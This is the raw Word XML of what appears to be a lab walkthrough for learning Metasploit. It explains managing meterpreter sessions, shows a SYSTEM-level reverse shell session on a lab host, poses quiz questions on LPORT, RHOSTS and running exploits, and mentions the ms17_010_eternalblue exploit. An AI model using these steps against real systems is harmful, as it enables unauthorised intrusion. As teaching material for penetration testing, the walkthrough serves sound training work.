          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CTRL+Z</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> can be used to background sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05598B8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sessions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command can be used from the msfconsole prompt or any context to see the existing sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574B7DBB"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Listing active sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0623632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sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169F781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ECE77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51D89ED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7E52843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EA7BB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43CC3A1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0CDDC45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32C1659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2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.10.44.70:4444 -&gt; 10.10.12.229:49186 (10.10.12.229)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4062351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29C26F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back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8EFF7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&gt; sessions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EB1AC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16EED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77A003B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50BAB04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50AAF3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25F106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2A918DC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2CF9960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2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.10.44.70:4444 -&gt; 10.10.12.229:49186 (10.10.12.229)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFDC9A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C2F266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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E1F42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02601366"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To interact with any session, you can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sessions -i</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command followed by the desired session number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD4EF5F"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Interacting with sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EFD5A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sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE40C6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BBE59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1A63B17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7D9BF3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2D49F3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11ECC5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436EA02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060394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2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.10.44.70:4444 -&gt; 10.10.12.229:49186 (10.10.12.229)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525FD8E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211E2D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sessions -i 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4337939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Starting interaction with 2...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4626DB8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BBFCC2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meterpreter &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68083B1A" w14:textId="77777777" w:rsidR="00BF61F8" w:rsidRPr="00BF61F8" w:rsidRDefault="00BF61F8" w:rsidP="00BF61F8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="F1685E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="F1685E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Answer the questions below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED0381A"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How would you set the LPORT value to 6666?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35050740" w14:textId="4E6973AC"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0D6D97D3">
          <v:shape id="_x0000_i1071" type="#_x0000_t75" style="width:42pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId20" o:title=""/>
          </v:shape>
          <w:control r:id="rId21" w:name="DefaultOcxName5" w:shapeid="_x0000_i1071"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF3F8DF"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Correct Answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569F3596"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How would you set the global value for RHOSTS  to 10.10.19.23 ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D7ACA3" w14:textId="07CB5C46"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40662F4D">
          <v:shape id="_x0000_i1075" type="#_x0000_t75" style="width:42pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId22" o:title=""/>
          </v:shape>
          <w:control r:id="rId23" w:name="DefaultOcxName12" w:shapeid="_x0000_i1075"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="5106A754"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Correct Answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074E319D"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What command would you use to clear a set payload?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD1FD52" w14:textId="4B1EF24E"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2B3178E9">
          <v:shape id="_x0000_i1079" type="#_x0000_t75" style="width:42pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId24" o:title=""/>
          </v:shape>
          <w:control r:id="rId25" w:name="DefaultOcxName21" w:shapeid="_x0000_i1079"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF00FD9"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lastRenderedPageBreak/>
        <w:t>Correct Answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239CE89A"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What command do you use to proceed with the exploitation phase?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55941D95" w14:textId="23650328"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23F8579E">
          <v:shape id="_x0000_i1083" type="#_x0000_t75" style="width:42pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId11" o:title=""/>
          </v:shape>
          <w:control r:id="rId26" w:name="DefaultOcxName31" w:shapeid="_x0000_i1083"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3FBB77" w14:textId="77777777" w:rsidR="00BF61F8" w:rsidRPr="00BF61F8" w:rsidRDefault="00BF61F8" w:rsidP="00BF61F8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440BD6F4" w14:textId="77777777" w:rsidR="00983DB6" w:rsidRPr="00983DB6" w:rsidRDefault="00983DB6" w:rsidP="00983DB6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00983DB6">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154239DE"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As we have seen so far, Metasploit is a powerful tool that facilitates the exploitation process. The exploitation process comprises three main steps; finding the exploit, customizing the exploit, and exploiting the vulnerable service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B2AA5B"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Metasploit provides many modules that you can use for each step of the exploitation process. Through this room, we have seen the basic components of Metasploit and their respective use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693E1B14"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It would be best if you also had used the ms17_010_eternalblue exploit to gain access to the target VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA1CD0C"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In the following rooms, we will cover Metasploit and its components in more detail. Once completed, this module should give you a good understanding of the capabilities of Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704405B8" w14:textId="77777777" w:rsidR="00983DB6" w:rsidRPr="00983DB6" w:rsidRDefault="00983DB6" w:rsidP="00983DB6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00983DB6">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Answer the questions below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9C652B" w14:textId="77777777" w:rsidR="00983DB6" w:rsidRPr="00983DB6" w:rsidRDefault="00983DB6" w:rsidP="00983DB6">
      <w:pPr>
        <w:spacing w:after="150"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No answer needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE0BF81" w14:textId="77777777" w:rsidR="003F210C" w:rsidRPr="003F210C" w:rsidRDefault="003F210C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003F210C" w:rsidRPr="003F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8A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B2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5E78"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C49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6971"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF76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87656"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="191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4284"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F24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350B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28E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97D6E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="73A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67E4A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C8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41C7A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="46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02E74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B8C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7758D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F386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A76D27"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A1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010CD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="72C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16009">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1723556077">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1205101242">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1071587597">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="823467745">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="460684130">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="609316119">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1590043022">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="268314762">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1800999397">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="631832952">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="2032146425">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="18769676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0C"/>
    <w:rsid w:val="001112A2"/>
    <w:rsid w:val="00146E29"/>
    <w:rsid w:val="002110A2"/>
    <w:rsid w:val="002237B9"/>
    <w:rsid w:val="003F210C"/>
    <w:rsid w:val="0065127F"/>
    <w:rsid w:val="00667085"/>
    <w:rsid w:val="00983DB6"/>
    <w:rsid w:val="00BF61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7B834D5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AD8A6B23-0FA3-4009-8BB9-C08966A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1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10A2"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00146E29"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00146E29"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00146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119">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2036341329">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="661467710">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="161162991">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="1021709810">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="82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9635">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="517231079">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="990522424">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="422648905">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="1397585875">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1828981573">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="140654857">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="240"/>
              <w:marBottom w:val="150"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2380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237">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="437533120">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="225"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="629163985">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2116946135">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1392263820">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="261450993">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="772360771">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1498301506">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="109908512">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="726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437">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1212689147">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="6173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7026">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="258372390">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="18666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201">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="946699161">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="2084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361">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
